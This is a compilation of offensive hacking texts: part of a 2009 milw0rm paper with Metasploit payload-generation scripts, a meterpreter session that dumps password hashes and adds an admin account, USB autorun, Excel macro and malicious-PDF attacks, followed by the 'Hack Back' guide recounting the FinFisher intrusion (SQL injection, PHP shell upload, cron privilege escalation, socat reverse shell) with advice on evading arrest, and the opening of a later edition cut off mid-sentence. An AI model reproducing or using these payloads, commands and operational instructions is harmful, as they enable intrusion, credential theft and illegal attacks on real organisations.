    Windows 2000 IP Configuration

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . : localdomain
    IP Address. . . . . . . . . . . . : 192.168.80.129
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.80.2

    C:\WINNT\system32>

    [End Result]————————————————————————————

    #############################################
    [0x04] – Client-Side Attack with Metasploit
    #############################################

    ++++++++++++++++++++++++++++++++++++++++
    [0x04a] – Metasploit Payload Generator
    ++++++++++++++++++++++++++++++++++++++++

    Metasploit Payload Generator is a tool allowing you to create malicious code easily.
    This is not a tool to exploit a system. You can use the tool to create malicious payload and
    save it to exe file then you need to lure a victim to execute that file on his/her machine.

    There is a feature to encode your payload to get past most AV and IDS/IPS (13 Encoding Choices).
    So we can use Metasploit Payload Generator from “Fast-Track”. If you don’t have “fast-track”, you need
    Metasploit framework and this script for you 😉

    [metascript]————————————————————————————

    #!/bin/bash
    echo “###########################################”
    echo “#### 0-Days Exploits with MetaCompiler ####”
    echo “###########################################”
    echo “”
    echo -n “Enter your Listener IP Address: ”
    read ip
    echo -n “Enter your Listener Port: ”
    read port
    echo “”
    echo “-= MetaCompiler Payloads =-”
    echo “”
    echo “+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++”
    echo “+ Meterpreter Reverse Connectback – windows/meterpreter/reverse_tcp +”
    echo “+ VNC Inject Reverse Connectback – windows/vncinject/reverse_tcp +”
    echo “+ Generic Reverse Shell – generic/shell_reverse_tcp +”
    echo “+ Linux X86 Reverse Shell – linux/x86/shell_reverse_tcp +”
    echo “+ Mac OSX (iphone) Reverse Shell – osx/ppc/shell/reverse_tcp +”
    echo “+ Windows Reverse Shell – windows/shell/reverse_tcp +”
    echo “+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++”
    echo “”
    echo -n “Enter your Payload Exploit: ”
    read payload
    echo -n “Enter your Output file name (xpl.exe): ”
    read file
    echo “”
    echo “-= Processing =-”
    /pentest/exploits/framework3/msfpayload $payload LHOST=$ip LPORT=$port R | /pentest/exploits/framework3/msfencode -b ” -t exe -o $file
    echo “Enjoy 0-Days Exploit with $file ;)”
    echo “”
    echo “”
    echo “-= Now Waiting for Reverse Connection from Victim =-”
    /pentest/exploits/framework3/msfcli multi/handler PAYLOAD=$payload LHOST=$ip LPORT=$port DisableCourtesyShell=True E

    [End script]————————————————————————————

    Next, Example for using “Fast-Track”.

    [Metasploit Gen]——————————————————————————–

    bt fast-track # ./fast-track.py -i

    ***********************************************
    ******* Performing dependency checks… *******
    ***********************************************

    *** FreeTDS and PYMMSQL are installed. (Check) ***
    *** PExpect is installed. (Check) ***
    *** ClientForm is installed. (Check) ***
    *** Psyco is installed. (Check) ***
    *** Beautiful Soup is installed. (Check) ***
    *** PyMills is installed. (Check) ***

    Also ensure ProFTP, WinEXE, and SQLite3 is installed from
    the Updates/Installation menu.

    Your system has all requirements needed to run Fast-Track!

    Fast-Track Main Menu:

    Fast-Track – Where it’s OK to finish in under 3 minutes…
    Version: v4.0
    Written by: David Kennedy (ReL1K)
    http://www.securestate.com
    http://www.thepentest.com

    1. Fast-Track Updates
    2. External Hacking
    3. Internal Hacking
    4. Exploits
    5. SQLPwnage
    6. Payload Generator
    7. Tutorials
    8. Changelog
    9. Credits
    10. About
    11. Exit

    Enter the number: 6
    Configuration file not detected, running default path.
    Recommend running setup.py install to configure Fast-Track.

    #####################################
    ### ###
    ### Metasploit Payload Generator ###
    ### ###
    ### Written by: Dave Kennedy ###
    ### aka ReL1K ###
    ### ###
    #####################################
    #####################################

    The Metasploit Payload Generator is a simple tool to
    make it extremely easy to generate a payload and listener
    on the Metasploit framework. This does not actually
    exploit any systems, it will generate a metasploit payload
    for you and save it to an executable. You then need to
    someone get it on the remote server by yourself and get it
    to execute correctly.

    This will also encode your payload to get past most AV and
    IDS/IPS.

    What payload do you want to generate:

    Name: Description:

    1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
    2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
    3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
    4. Windows Bind Shell Execute payload and create an accepting port on remote system.
    5. Windows Reflective Reverse VNC Spawn a VNC server on victim and send back to attacker.
    6. Windows Reflective Reverse Meterpreter Spawn a Meterpreter shell on victim through Reflective to attacker.

    Enter choice (example 1-6): 2

    Below is a list of encodings to try and bypass AV.

    Select one of the below, Avoid_UTF8_tolower usually gets past them.

    1. avoid_utf8_tolower
    2. shikata_ga_nai
    3. alpha_mixed
    4. alpha_upper
    5. call4_dword_xor
    6. countdown
    7. fnstenv_mov
    8. jmp_call_additive
    9. nonalpha
    10. nonupper
    11. unicode_mixed
    12. unicode_upper
    13. alpha2
    14. No Encoding

    Enter your choice : 2

    Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.80.131
    Enter the port of the Listener: 5555

    Do you want to create an EXE or Shellcode

    1. Executable
    2. Shellcode

    Enter your choice: 1
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
    Length: 278
    Options: LHOST=192.168.80.131,LPORT=5555,ENCODING=shikata_ga_nai

    A payload has been created in this directory and is named ‘payload.exe’. Enjoy!

    Do you want to start a listener to receive the payload yes or no: yes

    Launching Listener…
    ***********************************************************************************************

    Launching MSFCLI on ‘exploit/multi/handler’ with PAYLOAD=’windows/meterpreter/reverse_tcp’
    Listening on IP: 192.168.80.131 on Local Port: 5555 Using encoding: ENCODING=shikata_ga_nai

    ***********************************************************************************************
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler…
    [*] Transmitting intermediate stager for over-sized stage…(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage…
    [*] Uploading DLL (75787 bytes)…
    [*] Upload completed.
    [*] Meterpreter session 1 opened (192.168.80.131:5555 -> 192.168.80.1:13948)

    meterpreter > getuid
    Server username: LENOVO-X200\prathan
    meterpreter > use priv
    Loading extension priv…success.
    meterpreter > hashdump
    Administrator:500:F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
    Guest:501:A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
    prathan:1003:879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
    TsInternetUser:1002:52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
    meterpreter > execute -H -i -f cmd.exe
    Process 692 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\prathan\Desktop>hostname
    LENOVO-X200

    C:\Documents and Settings\prathan\Desktop>net user cwh 1234 /add
    net user cwh 1234 /add
    The command completed successfully.

    C:\Documents and Settings\prathan\Desktop>net localgroup administrators cwh /add
    net localgroup administrators cwh /add
    The command completed successfully.

    C:\Documents and Settings\prathan\Desktop>net user
    net user

    User accounts for \\

    ——————————————————————————-
    Administrator cwh Guest
    prathan TsInternetUser
    The command completed with one or more errors.

    [End Result]————————————————————————————

    From Above, We can Attack victim from Social-engineering if they execute “payload.exe”. What’s happen If we use Autorun.inf to force them execute our files.

    [USB Pwnage]————————————————————————————

    +autorun.inf
    [autorun]
    action=Open Files On Folder
    icon=icons\drive.ico
    shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

    +icons
    +nircmd.exe

    +batexe
    -progstart.bat
    @echo off
    nircmd.exe execmd CALL batexe\moddump.bat
    nircmd.exe execmd CALL batexe\modsmax.bat

    -moddump.bat
    @echo off
    nircmd.exe execmd .\batexe\payload.exe

    -modsmax.bat
    @echo off
    start ..
    nircmd.exe win max ititle “Remo”

    [End File]————————————————————————————-

    If someone open USB drive with Autorun or Double-click USB drive from My computer, Their System will compromised !!

    ++++++++++++++++++++++++++++++++++
    [0x04b] – MS-Office Macro Ownage
    ++++++++++++++++++++++++++++++++++

    MS word, Excel, Powerpoint, etc. can import VBscript to their files. Metasploit can generate VBScript that contains Malicious Payload !!
    In this example, we will show script for exploiting victim with MS-Excel. The victim machine will start reverse VNC to our machine after
    the victim opens MS-Excel file.

    [Msf script]————————————————————————————

    bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.80.131 V > /tmp/script.bas
    bt framework3 # ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.80.131 DisableCourtesyShell=True E
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler…
    [*] Transmitting intermediate stager for over-sized stage…(191 bytes)
    [*] Sending stage (2658 bytes)
    [*] Sleeping before handling stage…

    [End Result]————————————————————————————

    Now we have “script.bas”, Open MSExcel -> Tools -> Macro -> Visual Basic Editor then import “script.bas” and SAVE Excel file.
    After that use your skill for social engineering, Force them to open MSExcel and Enable Macros. We will control target via VNC viewer with their privilege.

    ++++++++++++++++++++++++++++++++++
    [0x04c] – AdobeReader PDF Ownage
    ++++++++++++++++++++++++++++++++++

    Metasploit has exploit script for Generating Malicious PDF file to Attack through “Adobe JBIG2Decode Memory Corruption”.
    This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
    When we generate malicious PDF, send to victim and social-engineering for open PDF file. Game Over !!

    [AdobeReader Exploit]—————————————————————————

    bt framework3 # msfconsole
    _ _ _ _
    | | | | (_) |
    _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
    | ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __|
    | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
    |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
    | |
    |_|

    =[ msf v3.3-dev
    + — –=[ 288 exploits – 124 payloads
    + — –=[ 17 encoders – 6 nops
    =[ 56 aux

    msf > use windows/fileformat/adobe_jbig2decode
    msf exploit(adobe_jbig2decode) > set TARGET 0
    TARGET => 0
    msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf
    FILENAME => malfile.pdf
    msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131
    LHOST => 192.168.80.131
    msf exploit(adobe_jbig2decode) > exploit

    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Creating ‘malfile.pdf’ file…
    [*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf
    [*] Exploit completed, but no session was created.
    msf exploit(adobe_jbig2decode) > exit
    bt framework3 # ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444
    LHOST=192.168.80.131 E
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler…
    [*] Transmitting intermediate stanger for over-sized stage…(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage…
    [*] Uploading DLL (75787 bytes)…
    [*] Upload completed.
    [*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.132:1041)

    meterpreter > getuid
    Server username: WINXP\victim
    meterpreter > execute -H -i -f cmd.exe
    Process 692 created.
    Channel 1 created.
    Micorsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\victim\Desktop> Ownage Again !!!

    [End Result]————————————————————————————

    Other techniques such as “DNS Spoofing+IE7” was great for Mass Exploit, you can see video at http://www.milw0rm.com/video/watch.php?id=96
    That use Ettercap for DNS spoofing then use Metasploit for handling reverse shell from “IE7 MS09-002 Memory Corruption Vulnerability”.That force all machine in the same network
    drive to attacker’s machine and … Game Over !!

    #####################
    [0x05] – References
    #####################

    [1] SANS: Scanning Windows Deepers With Nmap Scanning Engines
    [2] http://nmap.org
    [3] http://oss.coresecurity.com/projects/pshtoolkit.html
    [4] http://blog.metasploit.com/
    [5] http://foofus.net/jmk/passhash.html
    [6] Full Scope Security Attacking Layer 8
    [7] PaulDotCom Forum
    [8] www.milw0rm.com

    ####################
    [0x06] – Greetz To
    ####################

    Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
    Special Thx : asylu3, str0ke, citec.us, milw0rm.com

    —————————————————-
    This paper is written for Educational purpose only. The authors are not responsible for any damage
    originating from using this paper in wrong objective. If you want to use this knowleadge with other person systems,
    you must request for consent from system owner before
    —————————————————-

    # milw0rm.com [2009-07-10]

    Hack back

    More hacking PDFs
    https://thehiddenwiki.pw/files

    A DIY Guide for those without the patience to wait for whistleblowers

    –[ 1 ]– Introduction

    I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
    it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
    it is, and to hopefully inform and inspire you to go out and hack shit. If you
    have no experience with programming or hacking, some of the text below might
    look like a foreign language. Check the resources section at the end to help you
    get started. And trust me, once you’ve learned the basics you’ll realize this
    really is easier than filing a FOIA request.

    –[ 2 ]– Staying Safe

    This is illegal, so you’ll need to take same basic precautions:

    1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
    2) Inside the encrypted volume install Whonix [1]
    3) (Optional) While just having everything go over Tor thanks to Whonix is
    probably sufficient, it’s better to not use an internet connection connected
    to your name or address. A cantenna, aircrack, and reaver can come in handy
    here.

    [0] https://truecrypt.ch/downloads/
    [1] https://www.whonix.org/wiki/Download#Install_Whonix

    As long as you follow common sense like never do anything hacking related
    outside of Whonix, never do any of your normal computer usage inside Whonix,
    never mention any information about your real life when talking with other
    hackers, and never brag about your illegal hacking exploits to friends in real
    life, then you can pretty much do whatever you want with no fear of being v&.

    NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
    for some things like web browsing, when it comes to using hacking tools like
    nmap, sqlmap, and nikto that are making thousands of requests, they will run
    very slowly over Tor. Not to mention that you’ll want a public IP address to
    receive connect back shells. I recommend using servers you’ve hacked or a VPS
    paid with bitcoin to hack from. That way only the low bandwidth text interface
    between you and the server is over Tor. All the commands you’re running will
    have a nice fast connection to your target.

    –[ 3 ]– Mapping out the target

    Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
    domain names, and reverse whois lookups to find all IP address space and domain
    names associated with an organization.

    [0] http://ha.ckers.org/fierce/

    For an example let’s take Blackwater. We start out knowing their homepage is at
    academi.com. Running fierce.pl -dns academi.com we find the subdomains:
    67.238.84.228 email.academi.com
    67.238.84.242 extranet.academi.com
    67.238.84.240 mail.academi.com
    67.238.84.230 secure.academi.com
    67.238.84.227 vault.academi.com
    54.243.51.249 www.academi.com

    Now we do whois lookups and find the homepage of www.academi.com is hosted on
    Amazon Web Service, while the other IPs are in the range:
    NetRange: 67.238.84.224 – 67.238.84.255
    CIDR: 67.238.84.224/27
    CustName: Blackwater USA
    Address: 850 Puddin Ridge Rd

    Doing a whois lookup on academi.com reveals it’s also registered to the same
    address, so we’ll use that as a string to search with for the reverse whois
    lookups. As far as I know all the actual reverse whois lookup services cost
    money, so I just cheat with google:
    “850 Puddin Ridge Rd” inurl:ip-address-lookup
    “850 Puddin Ridge Rd” inurl:domaintools

    Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
    fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
    whois lookups and repeat the process until you’ve found everything.

    Also just google the organization and browse around its websites. For example on
    academi.com we find links to a careers portal, an online store, and an employee
    resources page, so now we have some more:
    54.236.143.203 careers.academi.com
    67.132.195.12 academiproshop.com
    67.238.84.236 te.academi.com
    67.238.84.238 property.academi.com
    67.238.84.241 teams.academi.com

    If you repeat the whois lookups and such you’ll find academiproshop.com seems to
    not be hosted or maintained by Blackwater, so scratch that off the list of
    interesting IPs/domains.

    In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
    was simply a whois lookup of finfisher.com which found it registered to the name
    “FinFisher GmbH”. Googling for:
    “FinFisher GmbH” inurl:domaintools
    finds gamma-international.de, which redirects to finsupport.finfisher.com

    …so now you’ve got some idea how I map out a target.
    This is actually one of the most important parts, as the larger the attack
    surface that you are able to map out, the easier it will be to find a hole
    somewhere in it.

    –[ 4 ]– Scanning & Exploiting

    Scan all the IP ranges you found with nmap to find all services running. Aside
    from a standard port scan, scanning for SNMP is underrated.

    Now for each service you find running:

    1) Is it exposing something it shouldn’t? Sometimes companies will have services
    running that require no authentication and just assume it’s safe because the url
    or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
    go to git.companyname.come/gitweb/ and browse their source code.

    2) Is it horribly misconfigured? Maybe they have an ftp server that allows
    anonymous read or write access to an important directory. Maybe they have a
    database server with a blank admin password (lol stratfor). Maybe their embedded
    devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
    default password.

    3) Is it running an old version of software vulnerable to a public exploit?

    Webservers deserve their own category. For any webservers, including ones nmap
    will often find running on nonstandard ports, I usually:

    1) Browse them. Especially on subdomains that fierce finds which aren’t intended
    for public viewing like test.company.com or dev.company.com you’ll often find
    interesting stuff just by looking at them.

    2) Run nikto [0]. This will check for things like webserver/.svn/,
    webserver/backup/, webserver/phpinfo.php, and a few thousand other common
    mistakes and misconfigurations.

    3) Identify what software is being used on the website. WhatWeb is useful [1]

    4) Depending on what software the website is running, use more specific tools
    like wpscan [2], CMS-Explorer [3], and Joomscan [4].

    First try that against all services to see if any have a misconfiguration,
    publicly known vulnerability, or other easy way in. If not, it’s time to move
    on to finding a new vulnerability:

    5) Custom coded web apps are more fertile ground for bugs than large widely used
    projects, so try those first. I use ZAP [5], and some combination of its
    automated tests along with manually poking around with the help of its
    intercepting proxy.

    6) For the non-custom software they’re running, get a copy to look at. If it’s
    free software you can just download it. If it’s proprietary you can usually
    pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
    can buy it (lame) or find other sites running the same software using google,
    find one that’s easier to hack, and get a copy from them.

    [0] http://www.cirt.net/nikto2
    [1] http://www.morningstarsecurity.com/research/whatweb
    [2] http://wpscan.org/
    [3] https://code.google.com/p/cms-explorer/
    [4] http://sourceforge.net/projects/joomscan/
    [5] https://code.google.com/p/zaproxy/

    For finsupport.finfisher.com the process was:

    * Start nikto running in the background.

    * Visit the website. See nothing but a login page. Quickly check for sqli in the
    login form.

    * See if WhatWeb knows anything about what software the site is running.

    * WhatWeb doesn’t recognize it, so the next question I want answered is if this
    is a custom website by Gamma, or if there are other websites using the same
    software.

    * I view the page source to find a URL I can search on (index.php isn’t
    exactly unique to this software). I pick Scripts/scripts.js.php, and google:
    allinurl:”Scripts/scripts.js.php”

    * I find there’s a handful of other sites using the same software, all coded by
    the same small webdesign firm. It looks like each site is custom coded but
    they share a lot of code. So I hack a couple of them to get a collection of
    code written by the webdesign firm.

    At this point I can see the news stories that journalists will write to drum
    up views: “In a sophisticated, multi-step attack, hackers first compromised a
    web design firm in order to acquire confidential data that would aid them in
    attacking Gamma Group…”

    But it’s really quite easy, done almost on autopilot once you get the hang of
    it. It took all of a couple minutes to:

    * google allinurl:”Scripts/scripts.js.php” and find the other sites

    * Notice they’re all sql injectable in the first url parameter I try.

    * Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
    the option –tamper=’tamper/modsecurityversioned.py’

    * Acquire the admin login information, login and upload a php shell [1] (the
    check for allowable file extensions was done client side in javascript), and
    download the website’s source code.

    [0] http://sqlmap.org/
    [1] https://epinna.github.io/Weevely/

    Looking through the source code they might as well have named it Damn Vulnerable
    Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
    javascript, and if you’re unauthenticated the admin page just sends you back to
    the login page with a Location header, but you can have your intercepting proxy
    filter the Location header out and access it just fine.

    [0] http://www.dvwa.co.uk/

    Heading back over to the finsupport site, the admin /BackOffice/ page returns
    403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
    sqli (it’s nice to have a dozen options to choose from). The other sites by the
    web designer all had an injectable print.php, so some quick requests to:
    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
    reveal that finsupport also has print.php and it is injectable. And it’s
    database admin! For MySQL this means you can read and write files. It turns out
    the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
    But I can use a short script that uses sqlmap –file-read to get the php source
    for a URL, and a normal web request to get the HTML, and then finds files
    included or required in the php source, and finds php files linked in the HTML,
    to recursively download the source to the whole site.

    Looking through the source, I see customers can attach a file to their support
    tickets, and there’s no check on the file extension. So I pick a username and
    password out of the customer database, create a support request with a php shell
    attached, and I’m in!

    –[ 5 ]– (fail at) Escalating

    ___________
    < got r00t? >
    ———–
    \ ^__^
    \ (oo)\_______
    (__)\ )\/\
    ||—-w |
    || ||
    ^^^^^^^^^^^^^^^^

    Root over 50% of linux servers you encounter in the wild with two easy scripts,
    Linux_Exploit_Suggester [0], and unix-privesc-check [1].

    [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
    [1] https://code.google.com/p/unix-privesc-check/

    finsupport was running the latest version of Debian with no local root exploits,
    but unix-privesc-check returned:
    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
    www-data can write to /etc/cron.hourly/mgmtlicensestatus
    WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
    can write to /etc/cron.hourly/webalizer

    so I add to /etc/cron.hourly/webalizer:
    chown root:root /path/to/my_setuid_shell
    chmod 04755 /path/to/my_setuid_shell

    wait an hour, and ….nothing. Turns out that while the cron process is running
    it doesn’t seem to be actually running cron jobs. Looking in the webalizer
    directory shows it didn’t update stats the previous month. Apparently after
    updating the timezone cron will sometimes run at the wrong time or sometimes not
    run at all and you need to restart cron after changing the timezone. ls -l
    /etc/localtime shows the timezone got updated June 6, the same time webalizer
    stopped recording stats, so that’s probably the issue. At any rate, the only
    thing this server does is host the website, so I already have access to
    everything interesting on it. Root wouldn’t get much of anything new, so I move
    on to the rest of the network.

    –[ 6 ]– Pivoting

    The next step is to look around the local network of the box you hacked. This
    is pretty much the same as the first Scanning & Exploiting step, except that
    from behind the firewall many more interesting services will be exposed. A
    tarball containing a statically linked copy of nmap and all its scripts that you
    can upload and run on any box is very useful for this. The various nfs-* and
    especially smb-* scripts nmap has will be extremely useful.

    The only interesting thing I could get on finsupport’s local network was another
    webserver serving up a folder called ‘qateam’ containing their mobile malware.

    –[ 7 ]– Have Fun

    Once you’re in their networks, the real fun starts. Just use your imagination.
    While I titled this a guide for wannabe whistleblowers, there’s no reason to
    limit yourself to leaking documents. My original plan was to:
    1) Hack Gamma and obtain a copy of the FinSpy server software
    2) Find vulnerabilities in FinSpy server.
    3) Scan the internet for, and hack, all FinSpy C&C servers.
    4) Identify the groups running them.
    5) Use the C&C server to upload and run a program on all targets telling them
    who was spying on them.
    6) Use the C&C server to uninstall FinFisher on all targets.
    7) Join the former C&C servers into a botnet to DDoS Gamma Group.

    It was only after failing to fully hack Gamma and ending up with some
    interesting documents but no copy of the FinSpy server software that I had to
    make due with the far less lulzy backup plan of leaking their stuff while
    mocking them on twitter.
    Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
    already so I can move on to step 2!

    –[ 8 ]– Other Methods

    The general method I outlined above of scan, find vulnerabilities, and exploit
    is just one way to hack, probably better suited to those with a background in
    programming. There’s no one right way, and any method that works is as good as
    any other. The other main ways that I’ll state without going into detail are:

    1) Exploits in web browers, java, flash, or microsoft office, combined with
    emailing employees with a convincing message to get them to open the link or
    attachment, or hacking a web site frequented by the employees and adding the
    browser/java/flash exploit to that.
    This is the method used by most of the government hacking groups, but you don’t
    need to be a government with millions to spend on 0day research or subscriptions
    to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
    for a couple thousand, and rent access to one for much less. There’s also
    metasploit browser autopwn, but you’ll probably have better luck with no
    exploits and a fake flash updater prompt.

    2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
    of the time.
    The infosec industry invented a term to make this sound like some sort of
    science: “Social Engineering”. This is probably the way to go if you don’t know
    too much about computers, and it really is all it takes to be a successful
    hacker [0].

    [0] https://www.youtube.com/watch?v=DB6ywr9fngU

    –[ 9 ]– Resources

    Links:

    * https://www.pentesterlab.com/exercises/
    * http://overthewire.org/wargames/
    * http://www.hackthissite.org/
    * http://smashthestack.org/
    * http://www.win.tue.nl/~aeb/linux/hh/hh.html
    * http://www.phrack.com/
    * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
    * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
    * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
    * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
    (all his other blog posts are great too)
    * https://www.corelan.be/ (start at Exploit writing tutorial part 1)
    * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
    One trick it leaves out is that on most systems the apache access log is
    readable only by root, but you can still include from /proc/self/fd/10 or
    whatever fd apache opened it as. It would also be more useful if it mentioned
    what versions of php the various tricks were fixed in.
    * http://www.dest-unreach.org/socat/
    Get usable reverse shells with a statically linked copy of socat to drop on
    your target and:
    target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
    host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
    It’s also useful for setting up weird pivots and all kinds of other stuff.

    Books:

    * The Web Application Hacker’s Handbook
    * Hacking: The Art of Exploitation
    * The Database Hacker’s Handbook
    * The Art of Software Security Assessment
    * A Bug Hunter’s Diary
    * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
    * TCP/IP Illustrated

    Aside from the hacking specific stuff almost anything useful to a system
    administrator for setting up and administering networks will also be useful for
    exploring them. This includes familiarity with the windows command prompt and unix
    shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
    networking, etc.

    –[ 10 ]– Outro

    You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
    tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
    customers are targeting and with what purpose that makes them evil. That’s not
    to say that tools are inherently neutral. Hacking is an offensive tool. In the
    same way that guerrilla warfare makes it harder to occupy a country, whenever
    it’s cheaper to attack than to defend it’s harder to maintain illegitimate
    authority and inequality. So I wrote this to try to make hacking easier and more
    accessible. And I wanted to show that the Gamma Group hack really was nothing
    fancy, just standard sqli, and that you do have the ability to go out and take
    similar action.

    Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
    Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
    hackers, dissidents, and criminals!

    Hack back a DIY guide

    More hacking PDFs
    https://thehiddenwiki.pw/files

    –[ 1 – Introduction ]———————————————————-

    You’ll notice the change in language since the last edition [1]. The
    English-speaking world already has tons of books, talks, guides, and
    info about hacking. In that world, there’s plenty of hackers better than me,
    but they misuse their talents working for “defense” contractors, for intelligence
    agencies, to protect banks and corporations, and to defend the status quo.
    Hacker culture was born in the US as a counterculture, but that origin only
    remains in its aesthetics – the rest has been assimilated. At least they can
    wear a t-shirt, dye their hair blue, use their hacker names, and feel like
    rebels while they work for the Man.

    You used to have to sneak into offices to leak documents [2]. You used to need
    a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
    Like the CNT said after the Gamma Group hack: “Let’s take a step forward with
    new forms of struggle” [5]. Hacking is a powerful tool, let’s learn and fight!

    [1] http://pastebin.com/raw.php?i=cRYvK4jb
    [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
    [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
    [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
    [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

    –[ 2 – Hacking Team ]———————————————————-

    Hacking Team was a company that helped governments hack and spy on
    journalists, activists, political opposition, and other threats to their power
    [1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
    and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
    fascist slogan “boia chi molla”. It’d be more correct to say “boia chi vende
    RCS”. They also claimed to have technology to solve the “problem” posed by Tor
    and the darknet [13]. But seeing as I’m still free, I have my doubts about
    its effectiveness.

    [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
    [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
    [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
    [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
    [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
    [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
    [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
    [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
    [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
    [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
    [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
    [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
    [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

    –[ 3 – Stay safe out there ]—————————————————

    Unfortunately, our world is backwards. You get rich by doing bad things and go
    to jail for doing good. Fortunately, thanks to the hard work of people like
    the Tor project [1], you can avoid going to jail by taking a few simple
